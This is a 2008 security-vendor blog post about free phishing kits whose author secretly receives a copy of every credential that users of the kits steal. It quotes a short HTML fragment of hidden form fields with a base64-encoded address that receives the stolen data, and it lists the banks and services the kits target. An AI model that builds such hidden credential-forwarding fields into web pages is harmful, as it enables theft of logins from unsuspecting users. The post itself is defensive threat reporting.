Wednesday, January 30, 2008 12:20 PM cmosby

Phishers Phished! | TrendLabs | Malware Blog - by Trend Micro

 

Phishers Phished!

January 30th, 2008 by Jovi Umawing

The ease of use and availability of tools used for malicious schemes has always been a problem for security companies, since these greatly contribute to the quick proliferation of codes and files that can affect Internet users. Web sites that represent an individual or group of individuals giving away free code and software for the whole community to use as they please are available almost anywhere.

Netcraft recently reported of a certain Mr. Brain–actually a group of Moroccan fraudsters–who recently launched a dedicated Web site for free phishing kits that anyone can use for their phishing activities. They lure interested parties by packaging the code as “easy-to-use” and “programmer-friendly,” since only a requirement on basic programming is needed to deploy this kit. Visitors of this site would hardly think twice in going for the bait, but upon closer inspection, it turns out that, though powerfully alluring, most good things are just too good to be true.

Certain codes were found to reveal the true nature of the email addresses where the phished information are to be sent once they were retrieved from the phishers’ victims: though the phished information are sent to the phishers, a copy of the phished information are also covertly sent back to Mr. Brain. Further analysis reveals what looks like Mr. Brain’s email address from this piece of code:

<input type=”hidden” id=”swich” /> <input name=”user” type=”hidden” />
<input name=”pass” type=”hidden” /> <input name=”defaultaddress” type=”hidden” /> <input name=”ip” type=”hidden” />

<input TXItQnJhaW5ARXZpbC1CcmFpbi5OZXQ=”);?>” name=”Send” type=”hidden” />

The code segment “TXItQnJhaW5ARXZpbC1CcmFpbi5OZXQ=” after decoding translates to the email address where the stolen information is sent.

Suffice it to say that the phishers who thought they had their victims didn’t know they had been had by Mr. Brain. This con saves Mr. Brain the more arduous task of hacking and compromising Web sites and deploying the phishing pages by himself: clearly a classic one-uppance the likes of which have never been seen before with regard to online theft.

Furthermore, Macalintal itemized the following banking and services establishments that that could potentially be affected by the Mr. Brain phishing scheme:

  • Abbey.co.uk
  • BankofAmerica.com
  • Chase.com
  • E-Gold.com
  • eBay.com
  • HSBC.co.uk
  • LloydsTSB.com
  • MoneyBookers.com
  • Nationwide.co.uk
  • NBK.Com.kw
  • PayPal.com
  • Regions.com
  • Stgeorge.com.au
  • Wachovia.com
  • Westernunion.com

Investigation about this operation is currently underway, and the authorities have been contacted for the proper action regarding this. Thanks to Ivan Macalintal and Robert McArdle for the information in this post.

Source: Phishers Phished! | TrendLabs | Malware Blog - by Trend Micro

Filed under: , , ,

Comments

No Comments